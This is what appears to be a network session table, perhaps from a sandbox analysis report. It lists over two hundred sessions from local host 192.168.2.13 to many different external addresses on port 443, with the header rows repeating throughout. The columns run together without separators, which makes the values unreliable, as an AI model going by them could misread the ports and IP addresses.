                                                  17290192.168.2.133465668.66.98.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17291192.168.2.134638278.225.206.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17292192.168.2.135168676.249.163.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17293192.168.2.133951481.50.74.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17294192.168.2.1360260120.235.225.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17295192.168.2.1354620162.202.160.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17296192.168.2.1340006206.140.155.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17297192.168.2.1360288133.170.132.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17298192.168.2.1340326161.151.181.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17299192.168.2.133321836.118.174.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17300192.168.2.133417039.49.188.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17301192.168.2.133310018.214.40.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17302192.168.2.1340134152.103.213.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17303192.168.2.1334082116.63.251.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17304192.168.2.1353884134.0.20.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17305192.168.2.1357944191.1.145.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17306192.168.2.136098686.150.166.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17307192.168.2.1341702122.167.27.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17308192.168.2.1345576182.234.7.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17309192.168.2.135738034.163.120.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17310192.168.2.135571037.169.129.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17311192.168.2.1341086115.185.49.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17312192.168.2.1349148189.246.137.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17313192.168.2.1351126129.133.179.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17314192.168.2.133541473.31.43.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17315192.168.2.135631845.233.76.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17316192.168.2.1343246157.229.5.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17317192.168.2.1359422100.141.207.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17318192.168.2.133787880.72.27.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17319192.168.2.1338876136.123.194.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17320192.168.2.1349740103.194.210.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17321192.168.2.1350926180.33.243.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17322192.168.2.133761057.116.150.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17323192.168.2.134914478.165.69.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17324192.168.2.1356320159.103.139.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17325192.168.2.1339142179.123.236.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17326192.168.2.13573124.157.40.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17327192.168.2.134163679.255.128.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17328192.168.2.13522029.154.87.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17329192.168.2.1345334104.212.114.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17330192.168.2.1336538101.217.199.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17331192.168.2.1356530204.243.78.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17332192.168.2.1333688157.74.239.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17333192.168.2.135819035.113.245.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17334192.168.2.1345524181.139.151.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17335192.168.2.1353098141.94.110.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17336192.168.2.135752285.46.63.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17337192.168.2.133567887.41.111.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17338192.168.2.134347240.79.18.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17339192.168.2.1341394122.21.14.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17340192.168.2.1347950144.47.114.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17341192.168.2.1359124173.38.28.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17342192.168.2.1343342103.17.26.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17343192.168.2.1347958190.142.22.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17344192.168.2.134971699.181.198.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17345192.168.2.1354112206.240.228.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17346192.168.2.1360582148.201.30.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17347192.168.2.1343196111.77.124.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17348192.168.2.1344568192.183.54.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17349192.168.2.1336854137.73.205.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17350192.168.2.1337736169.82.58.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17351192.168.2.135537027.247.29.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17352192.168.2.134241072.58.248.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17353192.168.2.1340874221.206.85.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17354192.168.2.1333906151.173.102.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17355192.168.2.1360190161.77.100.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17356192.168.2.135845440.42.60.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17357192.168.2.134755494.170.93.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17358192.168.2.1335176203.160.149.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17359192.168.2.136089682.86.177.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17360192.168.2.1342366150.4.65.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17361192.168.2.1358642207.226.25.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17362192.168.2.1349128126.20.103.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17363192.168.2.1335158110.52.247.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17364192.168.2.1352680120.121.124.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17365192.168.2.134157454.250.158.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17366192.168.2.134963696.95.186.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17367192.168.2.1337334220.190.233.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17368192.168.2.1337614184.9.148.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17369192.168.2.1340326174.98.5.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17370192.168.2.133513882.152.79.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17371192.168.2.134435449.82.235.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17372192.168.2.1338406129.70.143.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17373192.168.2.1346526169.177.156.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17374192.168.2.1355622140.15.191.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17375192.168.2.13348221.39.73.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17376192.168.2.1351576211.140.39.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17377192.168.2.1344970189.82.8.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17378192.168.2.1351150159.27.247.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17379192.168.2.1342684171.242.233.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17380192.168.2.1353882156.135.154.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17381192.168.2.1359784170.131.118.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17382192.168.2.1354632153.132.133.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17383192.168.2.1348072151.242.219.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17384192.168.2.135120483.30.7.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17385192.168.2.1352612199.169.220.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17386192.168.2.1356240174.55.104.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17387192.168.2.135655418.235.243.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17388192.168.2.135003293.74.199.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17389192.168.2.1360022166.233.229.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17390192.168.2.1338886118.108.195.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17391192.168.2.135344452.64.53.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17392192.168.2.1335028105.22.106.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17393192.168.2.1352556169.49.213.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17394192.168.2.1340256123.109.34.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17395192.168.2.1339802101.38.164.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17396192.168.2.1342512188.44.196.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17397192.168.2.133731458.108.25.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17398192.168.2.1355824108.118.232.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17399192.168.2.1354866112.179.45.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17400192.168.2.1351726129.122.41.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17401192.168.2.1348894206.104.183.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17402192.168.2.1353356202.143.34.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17403192.168.2.135368863.142.222.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17404192.168.2.1336716122.126.100.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17405192.168.2.135334865.51.31.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17406192.168.2.134989040.177.48.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17407192.168.2.1336824166.92.223.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17408192.168.2.133795849.161.224.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17409192.168.2.1338800199.48.83.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17410192.168.2.135107047.236.10.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17411192.168.2.135940027.245.49.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17412192.168.2.13458421.198.171.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17413192.168.2.136089414.231.1.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17414192.168.2.1336386106.76.75.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17415192.168.2.135471467.97.43.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17416192.168.2.133361681.28.233.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17417192.168.2.1340902168.73.192.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17418192.168.2.135921419.45.87.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17419192.168.2.1352970117.201.59.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17420192.168.2.1352516117.247.242.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17421192.168.2.13417765.229.117.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17422192.168.2.1345500169.175.164.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17423192.168.2.1354308209.20.81.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17424192.168.2.1342824163.210.237.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17425192.168.2.135265264.73.129.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17426192.168.2.135148444.213.71.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17427192.168.2.135137238.4.87.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17428192.168.2.1342674128.34.230.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17429192.168.2.1341922118.73.26.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17430192.168.2.134490673.223.85.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17431192.168.2.1360984168.71.166.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17432192.168.2.1351782170.7.219.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17433192.168.2.1356626108.47.143.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17434192.168.2.1357330206.227.123.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17435192.168.2.134533042.156.59.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17436192.168.2.1356654206.193.70.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17437192.168.2.1345552190.58.161.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17438192.168.2.1357416192.249.242.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17439192.168.2.1339252153.171.133.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17440192.168.2.1352952148.161.17.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17441192.168.2.1360928143.158.54.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17442192.168.2.136039024.117.103.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17443192.168.2.1359532117.114.31.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17444192.168.2.1358008146.72.236.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17445192.168.2.1341370144.186.89.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17446192.168.2.133913083.235.25.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17447192.168.2.133304259.212.32.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17448192.168.2.1356216199.20.64.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17449192.168.2.1356154133.39.21.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17450192.168.2.1350914135.255.117.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17451192.168.2.1358770211.172.49.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17452192.168.2.135414247.29.239.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17453192.168.2.135967850.165.83.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17454192.168.2.1334266115.61.194.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17455192.168.2.1342994124.144.187.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17456192.168.2.1341952154.91.252.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17457192.168.2.1348192164.99.168.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17458192.168.2.1350866109.66.164.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17459192.168.2.1346242191.113.182.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17460192.168.2.135187683.62.182.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17461192.168.2.1357968188.121.203.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17462192.168.2.1338740119.173.218.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17463192.168.2.1353482196.149.111.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17464192.168.2.1358770193.154.154.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17465192.168.2.135618240.104.46.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17466192.168.2.1357660222.83.47.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17467192.168.2.134549818.157.251.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17468192.168.2.1335636160.164.217.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17469192.168.2.1340906219.84.65.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17470192.168.2.13453762.35.207.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17471192.168.2.1334658129.38.175.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17472192.168.2.135349443.56.124.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17473192.168.2.134617487.221.31.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17474192.168.2.1346758151.43.51.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17475192.168.2.134345852.99.192.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17476192.168.2.1342304116.237.146.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17477192.168.2.1354572106.107.3.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17478192.168.2.1336506160.123.137.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17479192.168.2.1355466182.229.48.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17480192.168.2.135831054.36.230.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17481192.168.2.1353714106.221.6.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17482192.168.2.135293850.250.127.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17483192.168.2.135881047.59.119.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17484192.168.2.1352448198.208.150.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17485192.168.2.1350678206.120.202.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17486192.168.2.1340588198.87.153.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17487192.168.2.134062219.76.245.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17488192.168.2.135800876.212.202.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17489192.168.2.1360376192.166.59.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17490192.168.2.133800498.22.88.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17491192.168.2.1342036208.59.63.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17492192.168.2.1352770152.184.192.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17493192.168.2.134930038.239.92.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17494192.168.2.1349294121.220.228.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17495192.168.2.134626281.179.149.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17496192.168.2.135399084.187.238.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17497192.168.2.135286864.47.38.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17498192.168.2.134867877.223.228.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17499192.168.2.1346652190.67.132.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17500192.168.2.1351430160.180.157.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17501192.168.2.1356334147.49.190.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17502192.168.2.135348438.71.83.32443
